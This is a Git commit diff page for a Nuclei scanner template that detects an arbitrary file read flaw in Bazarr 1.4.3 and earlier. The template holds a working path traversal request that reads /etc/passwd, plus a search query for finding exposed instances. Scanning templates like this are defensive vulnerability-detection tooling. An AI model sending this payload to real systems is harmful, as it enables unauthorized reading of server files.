daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

minor-update

main
Dhiyaneshwaran 2024-07-21 14:21:48 +05:30 committed by GitHub
parent 2b4706defe
commit 3c9ba8908b
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 3 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml
View File

@ -7,13 +7,14 @@ info:
description: | description: |
Bazarr 1.4.3 and earlier versions have a arbitrary file read vulnerability. Bazarr 1.4.3 and earlier versions have a arbitrary file read vulnerability.
reference: reference:
- https://github.com/4rdr/proofs/blob/d70b285245ac6e6efc71aa82c4aac8a4c615c29f/info/Bazaar_1.4.3_File_Traversal_via_Filename.md - https://github.com/4rdr/proofs/blob/main/info/Bazaar_1.4.3_File_Traversal_via_Filename.md
- https://www.bazarr.media/ - https://www.bazarr.media/
metadata: metadata:
vendor: morpheus65535 vendor: morpheus65535
product: bazarr product: bazarr
fofa-query: title=="Bazarr" && icon_hash="-1983413099" fofa-query: title=="Bazarr" && icon_hash="-1983413099"
tags: bazarr,lfi tags: bazarr,lfi
flow: http(1) && http(2) flow: http(1) && http(2)
http: http:
@ -23,6 +24,7 @@ http:
matchers: matchers:
- type: word - type: word
part: body
words: words:
- '<title>Bazarr</title>' - '<title>Bazarr</title>'
internal: true internal: true
@ -32,7 +34,6 @@ http:
GET /api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 GET /api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex